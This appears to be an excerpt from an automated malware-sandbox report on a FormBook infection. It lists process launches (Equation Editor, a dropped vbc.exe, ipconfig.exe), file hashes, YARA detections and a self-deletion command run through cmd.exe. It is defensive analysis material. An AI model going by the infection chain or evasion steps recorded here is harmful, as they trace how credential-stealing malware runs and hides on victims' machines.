                                                                                                                                                                        MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high

                                                                                                                                                                        General

                                                                                                                                                                        Start time:21:12:57
                                                                                                                                                                        Start date:26/11/2020
                                                                                                                                                                        Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                        File size:543304 bytes
                                                                                                                                                                        MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high

                                                                                                                                                                        General

                                                                                                                                                                        Start time:21:13:00
                                                                                                                                                                        Start date:26/11/2020
                                                                                                                                                                        Path:C:\Users\Public\vbc.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:'C:\Users\Public\vbc.exe'
                                                                                                                                                                        Imagebase:0xec0000
                                                                                                                                                                        File size:478720 bytes
                                                                                                                                                                        MD5 hash:FD09F4D0B2373B9634F2D8AD2F5C899D
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                                                                                        Yara matches:
                                                                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2136258521.0000000003341000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2136258521.0000000003341000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2136258521.0000000003341000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2136150916.0000000002554000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2136301403.00000000033BB000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2136301403.00000000033BB000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2136301403.00000000033BB000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                        • Detection: 29%, ReversingLabs
                                                                                                                                                                        Reputation:low

                                                                                                                                                                        General

                                                                                                                                                                        Start time:21:13:02
                                                                                                                                                                        Start date:26/11/2020
                                                                                                                                                                        Path:C:\Users\Public\vbc.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:{path}
                                                                                                                                                                        Imagebase:0xec0000
                                                                                                                                                                        File size:478720 bytes
                                                                                                                                                                        MD5 hash:FD09F4D0B2373B9634F2D8AD2F5C899D
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Yara matches:
                                                                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2170693732.00000000000F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2170693732.00000000000F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2170693732.00000000000F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2170740872.0000000000180000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2170740872.0000000000180000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2170740872.0000000000180000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2170766828.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2170766828.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2170766828.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                        Reputation:low

                                                                                                                                                                        General

                                                                                                                                                                        Start time:21:13:04
                                                                                                                                                                        Start date:26/11/2020
                                                                                                                                                                        Path:C:\Windows\explorer.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:
                                                                                                                                                                        Imagebase:0xffca0000
                                                                                                                                                                        File size:3229696 bytes
                                                                                                                                                                        MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:moderate

                                                                                                                                                                        General

                                                                                                                                                                        Start time:21:13:16
                                                                                                                                                                        Start date:26/11/2020
                                                                                                                                                                        Path:C:\Windows\SysWOW64\ipconfig.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:C:\Windows\SysWOW64\ipconfig.exe
                                                                                                                                                                        Imagebase:0xf70000
                                                                                                                                                                        File size:27136 bytes
                                                                                                                                                                        MD5 hash:CABB20E171770FF64614A54C1F31C033
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Yara matches:
                                                                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2344836687.00000000002F0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2344836687.00000000002F0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2344836687.00000000002F0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2344664416.0000000000080000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2344664416.0000000000080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2344664416.0000000000080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2344806052.00000000002C0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2344806052.00000000002C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2344806052.00000000002C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                        Reputation:moderate

                                                                                                                                                                        General

                                                                                                                                                                        Start time:21:13:20
                                                                                                                                                                        Start date:26/11/2020
                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:/c del 'C:\Users\Public\vbc.exe'
                                                                                                                                                                        Imagebase:0x4a370000
                                                                                                                                                                        File size:302592 bytes
                                                                                                                                                                        MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high

                                                                                                                                                                        Disassembly

                                                                                                                                                                        Code Analysis

                                                                                                                                                                        Reset < >